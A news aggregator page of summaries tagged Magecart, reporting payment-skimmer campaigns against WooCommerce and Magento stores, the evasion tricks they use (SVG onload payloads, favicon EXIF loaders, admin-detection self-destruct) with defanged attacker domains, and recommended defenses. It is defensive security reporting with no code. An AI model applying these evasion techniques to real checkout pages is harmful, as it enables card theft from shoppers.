All news with #magecart tag

⚠️A critical vulnerability in the Funnel Builder WordPress plugin (affecting versions before 3.15.0.3) is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. Sansec reports attackers are planting fake Google Tag Manager-like scripts in the plugin's External Scripts setting to load payment skimmers. FunnelKit released a patch in v3.15.0.3; site owners should update immediately and inspect checkout scripts.

⚠️ A critical, unauthenticated vulnerability in the Funnel Builder WordPress plugin (versions before 3.15.0.3) is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. Attackers modify the plugin’s global settings via an exposed checkout endpoint to add a fake analytics script that opens a WebSocket and delivers a payment card skimmer. The injected skimmer harvests card numbers, CVVs, billing details and other customer data; site owners should update to 3.15.0.3 and inspect External Scripts.

🔍 Sansec researchers uncovered a campaign that embeds a credit-card skimmer into Magento storefronts by hiding it inside a 1×1-pixel SVG element with an onload handler. The handler stores the entire payload as a base64 string decoded via atob() and executed inline to avoid external script detection. When shoppers click checkout a fake Secure Checkout overlay validates card and billing fields in real time and exfiltrates data in XOR-encrypted, base64-obfuscated JSON; Sansec identified six exfiltration domains and published actionable mitigations.

🛡️ This report explains why a Magecart skimmer that hid its payload inside a favicon's EXIF metadata can evade repository-focused scanners. Claude Code Security inspects source code and repo artifacts, so it cannot observe malicious scripts injected through third‑party CDNs, tag managers, or images that only execute in users' browsers. The observed attack used a multi‑stage loader to assemble a URL, parse binary image metadata, and execute the extracted payload at checkout, silently exfiltrating payment data. The piece argues that runtime monitoring and stronger supply‑chain governance are essential complements to static analysis.

🔒 Silent Push researchers disclosed a long-running web skimming campaign active since January 2022 that targets customers of major payment networks including American Express, Mastercard, Discover, JCB, Diners Club and UnionPay. The attackers deliver highly obfuscated JavaScript from the domain cdn-cookie[.]com to e-commerce sites and use checks for WordPress’s wpadminbar to self‑destruct when administrators are present. The skimmer renders a fake Stripe payment form, harvests card and personal data, exfiltrates it to lasorie[.]com, then erases traces and sets a localStorage flag to prevent repeat infections, heightening risk for enterprise clients of affected payment providers.

🔒 Silent Push has uncovered a long-running Magecart web‑skimming campaign, active since around 2022, that loads highly obfuscated JavaScript from bulletproof hosting and targets six major card networks including American Express, Mastercard and UnionPay. The skimmer operates client-side, injecting an iframe to display a convincingly styled fake payment form that captures cardholder and shipping details before restoring the original form. Silent Push links parts of the infrastructure to domains hosted by a sanctioned/bulletproof provider and recommends measures such as Content Security Policy, PCI DSS adherence, timely CMS/plugin updates, enforced MFA and incognito-mode testing to detect stealthy injections.

🔍 The ThreatsDay bulletin opens 2026 with a cross-section of active campaigns and emerging tactics that emphasize stealth, precision, and financial motive. Highlights include the GhostAd Android adware drain, macOS supply-chain trojans tied to Open VSX extensions, a large non-KYC proxy network (IPCola), and multiple cloud and contract-exploit incidents. The roundup also details arrests, regulatory action, and evolving Magecart and click-fraud toolkits that collectively signal a shift toward low-noise, high-return operations.

🛡️ Web security in 2025 shifted rapidly as AI-enabled development and adversaries outpaced traditional controls. Natural-language "vibe coding" and compromised AI dev tools produced functional code with exploitable flaws, highlighted by the Base44 authentication bypass and multiple CVEs affecting popular assistants. At the same time, industrial-scale JavaScript injections, advanced Magecart e-skimming, and widespread privacy drift impacted hundreds of thousands of sites and thousands of financial sessions. Defenders moved toward security-first prompting, behavioral monitoring, continuous validation, and AI-aware controls to reduce exposure.

🔐 In episode 440 Graham Cluley and guest Scott Helme examine an unusual insider exploitation where Romanian prison self‑service web kiosks let inmates access and alter records. They also explore the growing threat of third‑party JavaScript on checkout pages and how the updated PCI DSS aims to curb Magecart‑style skimmers. Plus, the hosts cover automation with Keyboard Maestro and video creation using Screen Studio.

⚠️ The article warns that unmonitored JavaScript on e-commerce sites is the single biggest holiday security risk, enabling attackers to steal payment data while server-side defenses like WAFs and intrusion detection systems remain blind. It reviews major 2024 incidents, including the Polyfill.io and Cisco Magecart campaigns, and highlights a dramatic uptick in attacks during peak shopping windows. Recommended mitigations emphasize closing visibility gaps with real-time client-side monitoring, maintaining strict third-party script inventories, and deploying Content Security Policy (initially in report-only mode) using nonces rather than weakening directives.

🔒Payment iframes are no longer a guaranteed sandbox: attackers have adopted pixel-perfect overlays and other injection techniques to steal card data from checkout pages. The article dissects the August 2024 Stripe skimmer campaign that compromised dozens of merchants and used a deprecated API to validate stolen cards in real time. It explains why legacy controls like X-Frame-Options and basic CSP fail when the host page is compromised and outlines a practical six-step defense combining strict CSP, real-time DOM monitoring, secure postMessage handling, and tooling changes required by PCI DSS 4.0.1.